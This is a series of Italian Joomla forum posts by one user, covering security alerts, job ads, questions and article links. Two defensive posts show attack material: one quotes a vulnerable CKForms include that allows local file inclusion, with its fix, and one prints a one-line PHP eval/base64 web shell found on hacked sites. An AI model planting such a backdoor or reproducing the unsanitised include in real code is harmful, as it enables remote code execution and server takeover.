Topics

1

Sicurezza / Plimun Nivo spam injection -- modulo per nivo slider

« il: 09 Apr 2013, 22:09:09 »

il modulo in oggetto è stato rimosso dal jed ed è sotto investigazione per aver inserito dei link a siti 'sospetti' ad insaputa degli utenti.

il problema non riguarda nivo slider ma solo questa implementazione.

consiglio la rimozione e la sostituzione con altro slider. ulteriori info su:
http://forum.joomla.it/index.php/topic,179348.msg883946.html#msg883946

ciao a tutti,
marco

2

Sicurezza / mai installare l'ultima versione (php 5.3.7)

« il: 31 Ago 2011, 09:46:42 »

qui un interessante articolo che spiega perchè gli amministratori di sistema non installano MAI l' ultima versione appena uscita:

http://www.theregister.co.uk/2011/08/22/php_security_warning/


credetemi: non è l'unico caso... 

ciao,
marco

3

I vostri annunci su Joomla / Insegnante Joomla! per corsi aziendali

« il: 11 Feb 2011, 18:43:46 »

2FCommunication srl sta cercando una persona abile nella gestione di Joomla! per tenere corsi presso i propri clienti.
La figura richiesta dovrà avere una buona conoscenza della piattaforma Joomla! 1.5 (gestione pacchetti virtuemart e joomfish, news, photogallery).

La prima sede di lavoro sarà Monza (MB).

informazioni di contatto:
rife: Leoni Marco Maria
curricula@2fcommunication.com

2FCommunication srl
Sede Legale: Via del Pratellino, 14/b - 50131 – Firenze - n. REA 474877 FIRENZE
Sede Operativa: Viale Monza, 12 - 20127 - Milano - n. REA 1663228 MILANO

ciao a tutti
marco

4

Sviluppo / ACL J1.6 per table access

« il: 22 Gen 2011, 09:32:05 »

ciao qualcuno ha capito come si impostano le ACL di j1.6 per l'accesso ad una specifica sezione di un componente (tabella/controller/model)?

faccio un esempio: il componente per gestire i banner di joomla; più sezioni, una gestisce le categorie, l'altra i banner, et cetera.
ho trovato la documentazione su come impostare le ACL per l'accesso al componente e per l'accesso alle singole righe delle tabelle categorie e banner, ma come si imposta l'accesso all'intera tabella? In altri termini voglio un gruppo di utenti che possa accedere a tutto ed uno che possa accedere solo ai banner, a quest'ultimo sarà perciò precluso l'accesso al menù di gestione delle categorie.

ciao,
marco

5

I vostri annunci su Joomla / Sviluppatore Junior part-time Milano

« il: 11 Gen 2011, 19:08:46 »

2FCommunication srl sta cercando un programmatore php junior part-time.
La figura richiesta dovrà avere una  buona conoscenza della piattaforma Joomla! 1.5 (installazione, messa in sicurezza, installazione e gestione pacchetti virtuemart e joomfish) e della programmazione php/mysql.
Sono elementi graditi la conoscenza di JavaScript/CSS, sistemi linux/windows (servers) e linguaggi .NET.

La sede di lavoro è Milano (Loreto)

informazioni di contatto:
rife: Leoni Marco Maria
curricula@2fcommunication.com

2FCommunication srl
Sede Legale: Via del Pratellino, 14/b - 50131 – Firenze - n. REA 474877 FIRENZE
Sede Operativa: Viale Monza, 12 - 20127 - Milano - n. REA 1663228 MILANO

ps: il colloquio sarà sostenuto con me, quindi se mi conoscete sapete che vi aspetta 

ciao a tutti
marco

6

Sicurezza / Protezione da SQL injection e LFI

« il: 31 Mag 2010, 21:43:54 »

ciao,
  dato che bugSearch.net mi ha fatto venire l'angoscia ho scritto un plugin per proteggere il sito dai vari attacchi citati:

http://extensions.joomla.org/extensions/access-a-security/site-security/12731

questo plugin intercetta le richieste inviate a joomla e blocca i principali attacchi SQL injection e LFI (local file inclusion) impedendo che arrivino al componente vulnerabile.

Domande e spiegazioni in coda a questo post, non sul mio sito (tutto ciò che va al mio sito si presume a pagamento  )

ciao a tutti,
marco

7

Sicurezza / Attacchi a raffica a CKForms 1.3.3; AGGIORNARE a 1.3.4

« il: 29 Mag 2010, 14:49:38 »

stavo verificando un po' dei logs dei vari server che gestisco e mi è saltato all'occhio un incremento esponenziale degli attacchi a questo componente.

la versione citata, oltre a problemi di SQL injection, soffriva anche di una vulnerabilità agli attacchi di tipo LFI (local file inclusion), dovuta ad una non accorta scrittura dell'entry point del front end:

Codice: [Seleziona]

if($controller = JRequest::getVar('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}

corretta poi in:

Codice: [Seleziona]

if($controller = JRequest::getCmd('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}

nella 1.3.4.

mentre il risultato di un attacco di tipo SQL injection è tipicamente il defacement del sito, il risultato di un LFI può arrivare facilmente all'impossessarsi dell'intero server.

è per altro vero che sia necessario che il server non sia configurato a regola d'arte, ma è ormai certo che ci siano in giro un sacco di dilettanti che si spacciano per sysadmins.


comunque: aggiornare immediatamente a 1.3.4.

ciao,
marco

8

Sicurezza / Disponibile Joomla! 1.5.16 - Aggiornate gente, aggiornate

« il: 24 Apr 2010, 18:41:38 »

è disponibile per il download la versione 1.5.16 localizzata in italiano.
sono altresì disponibili i pacchetti di aggiornamento dalle varie versioni precedenti.

consiglio a tutti di provvedere all'aggiornamento, dato che vi sono anche diversi security fixes.

un grazie ai traduttori per l'impegno e la velocità!!

ciao a tutti,
marco

9

Articoli della community / Capire i permessi dei server Linux negli hosting

« il: 22 Apr 2010, 12:42:26 »

E subito dopo tonicopi arriva la legnata 

eccovi una bella spiegazione tecnica del mondo linux, da leggere se vi siete chiesti che mai significhi 777 ...

link: http://www.joomla.it/articoli-della-community/4200-i-permessi-linux-e-lhosting.html

spero non sia troppo un mattone.

ciao,
marco

10

Gestione e-commerce / Pagina dei marchi trattati (manufacturers )

« il: 28 Mar 2010, 14:07:52 »

ciao a tutti,
  sto realizzando un e-commerce in cui un link deve essere 'le nostre marche' ovvero l'elenco dei marchi trattati dal negozio e con la possibilità di visualizzare tutti i prodotti di uno specifico marchio.

sbaglio o non esiste una tale possibilità? parlo dell'installazione base di virtuemart, perché a realizzarlo ho impiegato 20 minuti, ma mi sembra strano che non ci sia...

ciao,
marco

11

Sicurezza / eval (base64_decode($_POST["php"])) ATTENZIONE

« il: 25 Mar 2010, 20:29:07 »

Avviso ai naviganti:
ho visto diversi post più o meno simili, e quindi se vi trovate uno strano file di pochi bites, che sostanzialmente contiene solo:

<?php
eval (base64_decode($_POST["php"]));
?>

sappiate che il vostro sito è stato vittima di un hack, ovvero qualcuno è riuscito ad entrare ed ha lasciato questo file per poter agevomente mandare in esecuzione un codice php arbitrario sul vostro sito.

questo file può assumere vari nomi (pop, post, google, mailcheck) e trovarsi in una o più directories, root compresa.

quando avete un attimo di tempo provate a verificare i files *.php, almeno controllate le date.

questo file deve essere cancellato, non basta sovrascrivere l'installazione altrimenti il sito resterà soggetto ad hacks.

ciao,
marco

12

Articoli della community / Modificare url e percorsi in .htaccess con le funzionalità di mod_rewrite

« il: 29 Gen 2010, 16:38:23 »

Questo articolo spiega le basi del funzionamento del mod_rewrite usato da joomla per le funzioni SEO.
Non ha la pretesa di insegnare, ma illustra alcuni esempi comuni in ambito Joomla! spiegandone dettagliatamente, e spero chiaramente , il funzionamento.

Un'avvertenza l'artico è abbastanza 'tosto', nel senso che è un discreto mattone


Link: http://www.joomla.it/articoli-della-community/4040-modificare-gli-url-in-htaccess-con-le-funzioni-di-modrewrite.html

ciao,
marco

13

Articoli della community / Spostare Joomla! da una sottodirectory alla root, preservando il posizionamento

« il: 26 Gen 2010, 19:11:02 »

Una domanda frequente, sia nel forum relativo all'installazione e migrazione, sia in quello relativo al SEO, riguarda come spostare Joomla! da una sottodirectory alla root del sito, soprattutto, come fare ciò preservando il posizionamento già raggiunto nei motori di ricerca.

In questo articolo vediamo come si fa:

Link: http://www.joomla.it/articoli-della-community/4036-spostare-joomla-da-una-sottodirectory-alla-root-preservando-il-posizionamento.html

ciao a tutti,
marco